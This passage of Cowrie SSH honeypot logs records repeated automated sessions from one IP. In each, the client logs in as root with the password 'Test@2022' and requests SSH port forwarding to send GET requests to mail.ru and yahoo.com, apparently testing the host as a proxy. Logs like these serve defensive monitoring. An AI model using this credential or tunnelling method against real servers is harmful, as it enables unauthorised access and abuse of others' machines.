160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:27.769879Z","src_ip":"77.83.207.83","session":"cde3a5744270"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.017342Z","src_ip":"77.83.207.83","session":"cde3a5744270"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12460,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12460","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.068189Z","session":"cde3a5744270"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.117929Z","src_ip":"77.83.207.83","session":"cde3a5744270"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":1014,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1014","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.260202Z","session":"cde3a5744270"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.309842Z","src_ip":"77.83.207.83","session":"cde3a5744270"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":13909,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:13909","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.452009Z","session":"cde3a5744270"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.501727Z","src_ip":"77.83.207.83","session":"cde3a5744270"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.552476Z","src_ip":"77.83.207.83","session":"cde3a5744270"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16375,"dst_ip":"1.2.3.4","dst_port":22,"session":"77051f514fcf","protocol":"ssh","message":"New connection: 77.83.207.83:16375 (1.2.3.4:22) [session: 77051f514fcf]","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.601105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.611344Z","src_ip":"77.83.207.83","session":"77051f514fcf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.651073Z","src_ip":"77.83.207.83","session":"77051f514fcf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.899066Z","src_ip":"77.83.207.83","session":"77051f514fcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24294,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24294","sensor":"my-vps","timestamp":"2025-08-31T03:50:28.950296Z","session":"77051f514fcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.000098Z","src_ip":"77.83.207.83","session":"77051f514fcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":1408,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1408","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.140175Z","session":"77051f514fcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.189987Z","src_ip":"77.83.207.83","session":"77051f514fcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":1852,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1852","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.332102Z","session":"77051f514fcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.381778Z","src_ip":"77.83.207.83","session":"77051f514fcf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.432500Z","src_ip":"77.83.207.83","session":"77051f514fcf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16476,"dst_ip":"1.2.3.4","dst_port":22,"session":"137ec2034c57","protocol":"ssh","message":"New connection: 77.83.207.83:16476 (1.2.3.4:22) [session: 137ec2034c57]","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.483264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.484154Z","src_ip":"77.83.207.83","session":"137ec2034c57"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.535197Z","src_ip":"77.83.207.83","session":"137ec2034c57"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.789797Z","src_ip":"77.83.207.83","session":"137ec2034c57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5110,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5110","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.841696Z","session":"137ec2034c57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:29.892870Z","src_ip":"77.83.207.83","session":"137ec2034c57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13616,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:13616","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.037284Z","session":"137ec2034c57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.088338Z","src_ip":"77.83.207.83","session":"137ec2034c57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":4287,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:4287","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.233470Z","session":"137ec2034c57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.284498Z","src_ip":"77.83.207.83","session":"137ec2034c57"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.336105Z","src_ip":"77.83.207.83","session":"137ec2034c57"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16570,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbd0694fadbd","protocol":"ssh","message":"New connection: 77.83.207.83:16570 (1.2.3.4:22) [session: bbd0694fadbd]","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.385378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.394259Z","src_ip":"77.83.207.83","session":"bbd0694fadbd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.435752Z","src_ip":"77.83.207.83","session":"bbd0694fadbd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.687407Z","src_ip":"77.83.207.83","session":"bbd0694fadbd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28200,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:28200","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.738576Z","session":"bbd0694fadbd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.789002Z","src_ip":"77.83.207.83","session":"bbd0694fadbd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31637,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31637","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.932667Z","session":"bbd0694fadbd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:30.982957Z","src_ip":"77.83.207.83","session":"bbd0694fadbd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":30670,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:30670","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.124631Z","session":"bbd0694fadbd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.174891Z","src_ip":"77.83.207.83","session":"bbd0694fadbd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.225795Z","src_ip":"77.83.207.83","session":"bbd0694fadbd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16677,"dst_ip":"1.2.3.4","dst_port":22,"session":"426fbffdbd74","protocol":"ssh","message":"New connection: 77.83.207.83:16677 (1.2.3.4:22) [session: 426fbffdbd74]","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.273977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.275016Z","src_ip":"77.83.207.83","session":"426fbffdbd74"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.324547Z","src_ip":"77.83.207.83","session":"426fbffdbd74"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.571460Z","src_ip":"77.83.207.83","session":"426fbffdbd74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20633,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:20633","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.621769Z","session":"426fbffdbd74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.671486Z","src_ip":"77.83.207.83","session":"426fbffdbd74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":358,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:358","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.811950Z","session":"426fbffdbd74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:31.862487Z","src_ip":"77.83.207.83","session":"426fbffdbd74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":7236,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7236","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.003925Z","session":"426fbffdbd74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.053713Z","src_ip":"77.83.207.83","session":"426fbffdbd74"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.104720Z","src_ip":"77.83.207.83","session":"426fbffdbd74"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16785,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d2deb099a7","protocol":"ssh","message":"New connection: 77.83.207.83:16785 (1.2.3.4:22) [session: f2d2deb099a7]","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.153569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.154596Z","src_ip":"77.83.207.83","session":"f2d2deb099a7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["e